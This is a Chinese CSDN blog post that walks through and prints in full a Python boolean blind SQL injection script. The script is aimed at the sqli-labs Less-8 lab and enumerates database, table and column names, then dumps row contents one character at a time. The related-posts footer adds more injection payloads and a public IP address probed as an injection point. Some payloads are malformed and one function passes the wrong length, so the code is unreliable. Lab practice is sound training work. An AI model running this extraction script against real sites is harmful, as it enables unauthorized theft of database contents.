SQL注入:布尔注入脚本

最新推荐文章于 2024-06-02 00:37:44 发布
最新推荐文章于 2024-06-02 00:37:44 发布
阅读量860 收藏 10
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/118912668
版权

SQL盲注 数据库信息 数据内容 布尔猜解 信息提取
关键词由CSDN通过智能技术生成
实现思路

将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。

  1. 数据库名:获取库名长度,库名
  2. 数据库表:获取数据库表数量,表名长度,表名
  3. 表字段:获取字段数,字段名长度,字段名
  4. 表数据:获取该字段数据行数,数据长度,数据内容
关键代码

获取不同数据的payload字典

payload_dict = {
    "db_name_len":      "' and if(length(database())={number}, 1, 0) -- qwe",
    "db_name":          "' and if(ascii(substr(database(), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "table_num":        "' and if((select count(*) from information_schema.tables where table_schema=database())={number}, 1, 0) -- qwe",
    "table_name_len":   "' and if(length((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "table_name":       "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "column_num":       "' and if((select count(*) from information_schema.columns where table_schema=database() and table_name='{table_name}')={number}, 1, 0) -- qwe",
    "column_name_len":  "' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "column_name":      "' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "data_num":         "' and if((select count(*) from {table_name})={number}, 1, 0) -- qwe",
    "data_len":         "' and if(length((select {column_name} from {table_name} limit {limit_index}, 1, 0))={number}, 1, 0) -- qwe",
    "data":             "' and if(ascii(substr((select {column_name} from {table_name} limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe"
}

核心函数

# 获取数据长度/数量
def get_len(payload, **parameter):
    target_url = url + payload
    for i in range(999):
        parameter["number"] = i
        res = conn.get(target_url.format(**parameter))
        if flag in res.text:
            return i

# 获取数据内容
def get_content(payload, **parameter):
    name = ""
    target_url = url + payload
    substr_index = parameter["substr_index"]
    # 根据字段长度,遍历获取每个字符
    for i in range(1, substr_index+1):
        parameter["substr_index"] = i
        # 猜解字符
        for j in range(33, 128):
            parameter["number"] = j
            res = conn.get(target_url.format(**parameter))
            if flag in res.text:
                name += chr(j)
    return name

substr_index参数每次传进来的是数据长度,然后再遍历猜解每个字符

全部代码
# sql布尔盲注
"""
实现思路
1. 获取库名长度
2. 获取库名
3. 获取数据库表数量
4. 获取表名长度
5. 获取表名
6. 获取字段数
7. 获取字段名长度
8. 获取字段名
9. 获取数据表行数
10.获取该字段数据长度
11.获取数据内容
"""

import requests
flag = "You are in..........."
conn = requests.session()
url = "http://localhost/sqli/Less-8/?id=1"

# 获取不同数据的payload字典
payload_dict = {
    "db_name_len":      "' and if(length(database())={number}, 1, 0) -- qwe",
    "db_name":          "' and if(ascii(substr(database(), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "table_num":        "' and if((select count(*) from information_schema.tables where table_schema=database())={number}, 1, 0) -- qwe",
    "table_name_len":   "' and if(length((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "table_name":       "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "column_num":       "' and if((select count(*) from information_schema.columns where table_schema=database() and table_name='{table_name}')={number}, 1, 0) -- qwe",
    "column_name_len":  "' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "column_name":      "' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "data_num":         "' and if((select count(*) from {table_name})={number}, 1, 0) -- qwe",
    "data_len":         "' and if(length((select {column_name} from {table_name} limit {limit_index}, 1, 0))={number}, 1, 0) -- qwe",
    "data":             "' and if(ascii(substr((select {column_name} from {table_name} limit {limit_index}, 1, 0), {substr_index}, 1))={number}, 1, 0) -- qwe"
}

# 传参字典
parameter = {}

# 获取数据库名
def get_dbname():
    print("[*] ===================开始获取数据库名长度===================")
    db_name_len = get_len(payload_dict["db_name_len"])
    print("[+] 数据库名长度为: ", db_name_len)
    db_name = get_content(payload_dict["db_name"], substr_index=db_name_len)
    print("[+] 数据库名为: ", db_name)
    return db_name

# 获取库中所有表(返回列表形式)
def get_table(db_name):
    print("[*] ===================开始获取所有表===================")
    # 获取数据库表数量
    table_num = get_len(payload_dict["table_num"])
    print("[*] 数据库{}的表数量为{}".format(db_name, table_num))
    # 获取所有表名
    table_list = []
    for i in range(table_num):
        # 先获取表名长度
        table_name_len = get_len(payload_dict["table_name_len"], limit_index=i)
        # 再获取表名
        # 先给substr_index传最大值,也就是表名的长度,然后再遍历
        table_name = get_content(payload_dict["table_name"], substr_index=table_name_len, limit_index=i)
        print("[+] 第{}个表名为: {}".format(i+1, table_name))
        table_list.append(table_name)
    return table_list

# 获取数据表中所有字段(返回列表形式)
def get_column(table_name):
    print("[*] ===================开始获取数据表字段===================")
    # 先获取字段数
    column_num = get_len(payload_dict["column_num"], table_name=table_name)
    print("[+] 字段数为: ", column_num)
    # 获取所有字段
    column_list = []
    for i in range(column_num):
        # 先获取字段长度
        column_name_len = get_len(payload_dict["column_name_len"], table_name=table_name, limit_index=i)
        # 再获取字段名
        column_name = get_content(payload_dict["column_name"], table_name=table_name, limit_index=i, substr_index=column_name_len)
        print("[+] 第{}个字段为: {}".format(i+1, column_name))
        column_list.append(column_name)
    return column_list

# 获取列中所有数据(返回列表形式)
def get_column_data(table_name, column_name):
    print("[*] ===================正在获取列{}的数据===================".format(column_name))
    # 先获取数据行数
    data_num = get_len(payload_dict["data_num"], table_name=table_name)
    # 获取数据内容
    data_list = []
    for i in range(data_num):
        # 先获取每行数据长度
        data_len = get_len(payload_dict["data_len"], table_name=table_name, column_name=column_name, limit_index=i)
        # 再获取每行数据内容
        data = get_content(payload_dict["data"], table_name=table_name, column_name=column_name, limit_index=i, substr_index=data_num)
        print("[+] ", data)
        data_list.append(data)
    return data_list

# 数据获取主函数
def get_data(table_list):
    while True:
        # 遍历表
        for i in range(len(table_list)):
            print([i+1], " ", table_list[i])
        index = input("要获取哪个表的数据(输入序号)")
        try:
            index = int(index)
        except Exception:
            print("非法输入")
            continue
        if index > len(table_list) or index < 1:
            print("请重新确认序号")
            continue
        # 用字典来保存表中的数据
        data = {}
        # 先获取列
        column_list = get_column(table_list[index-1])
        # 遍历列
        for j in column_list:
            data[j] = get_column_data(table_list[index-1], j)

        # 以表格形式输出
        for key in data.keys():
            print(key, end="    ")
        print("") # 换行

        value_list = [i for i in data.values()]
        column_num = len(data.keys())
        row_num = len(value_list[0])
        for i in range(row_num):
            for j in range(column_num):
                print(value_list[j][i], end="    ")
            print("")

# 核心函数, 用于获取数据长度/数量
def get_len(payload, **parameter):
    target_url = url + payload
    for i in range(999):
        parameter["number"] = i
        res = conn.get(target_url.format(**parameter))
        if flag in res.text:
            return i

# 核心函数, 用于获取数据内容
def get_content(payload, **parameter):
    name = ""
    target_url = url + payload
    substr_index = parameter["substr_index"] = parameter["substr_index"]
    # 根据字段长度,遍历获取每个字符
    for i in range(1, substr_index+1):
        parameter["substr_index"] = i
        # 猜解字符
        for j in range(33, 128):
            parameter["number"] = j
            res = conn.get(target_url.format(**parameter))
            if flag in res.text:
                name += chr(j)
    return name

if __name__ == '__main__':
    db_name = get_dbname()
    table_list = get_table(db_name)
    get_data(table_list)
运行效果在这里插入图片描述
分等级考试的佛
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入 布尔的盲注--手工+脚本一起更方便
mdp1234的博客
08-26 1120
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。 第一步:找注入点(数字)http://219.153.49.228/new_list.php?id=1 加 ’ 程序报错 加and 1=1 返回正常页面 加and 1=2 返回错误页面 则表示存在注入漏洞 ...
Python自动化sql注入布尔盲注
qq_46145027的博客
04-22 3490
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
SQL注入脚本编写
L1ni01
11-13 2108
SQL注入脚本编写 穷举 1.bool盲注脚本(post) import requests url = "http://127.0.0.1/sqli-labs-master/Less-15/" result ="" for i in range(1,10): for j in range(65,150): payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j) payload2 = "admin'^(ascii(
sql注入-布尔盲注
最新发布
WolvenSec的博客
06-02 1241
布尔盲注(Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
SQL注入漏洞:CMS布尔盲注python脚本编写
一个努力学习网安的小牛马
11-07 204
【代码】SQL注入漏洞:CMS布尔盲注python脚本编写
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 408
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
SQL注入之基于布尔的盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类:直列注入、延时...
SQL脚本_UI_sql注入_sql_
10-01
本主题主要关注通过用户界面(UI)执行的SQL注入攻击,以及两种常见的注入技术:报错注入和基于布尔及时间的盲注。下面我们将深入探讨这些概念。 首先,SQL注入是由于应用程序未能正确过滤或转义用户输入导致的。当...
自己动手编写SQL注入漏洞扫描器
12-24
### 自己动手编写SQL注入漏洞扫描器 #### 功能需求分析与实现思路 **功能需求:** 1. **支持单个/批量网站扫描** - 单个网站扫描功能是基本要求,它允许用户对特定目标进行深入检测。 - 批量网站扫描功能对于...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
Python脚本】SQL盲注漏洞——基于布尔SQL盲注检测
weixin_55205599的博客
10-18 101
1)写入脚本信息,导入模板,定义存储数据库数据的变量且定义一个request对象用来进行请求。
Python自动化sql注入布尔盲注_布尔盲注脚本(1),高级网络安全面试题2024
2401_84182636的博客
04-10 598
特点:没有回显没有报错,但根据sql语句正常与否返回不同结果,通过语句是否正常来注入。靶场:sqli-labs第八关。
SQL注入-布尔盲注】
acepanhuan的博客
02-10 1677
学习SQL注入方法之盲注
写一个布尔盲注的脚本
weixin_35752645的博客
01-01 488
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入:sqlmap布尔盲注payload解析
无名J0kзr的博客
10-07 3848
难受 占坑明天更
DVWA布尔注入脚本
Bu2n的博客
12-01 537
DVWA布尔注入脚本 import requests from lxml import etree """ 前提 pip install requests pip install lxml 如果是爆破dvwa的话,只需要网站登录一下dvwa,记录一下cookie,改一下url,referer 如果不是则需要修改的参数有payload,xpath,结果内容 该脚本只测试过low级别 """ url = 'http://192.168.159.132/dvwa/vulnerabilities/sqli
Python自动化sql注入布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 847
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
SQL注入
weixin_47535681的博客
06-03 306
SQL注入
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值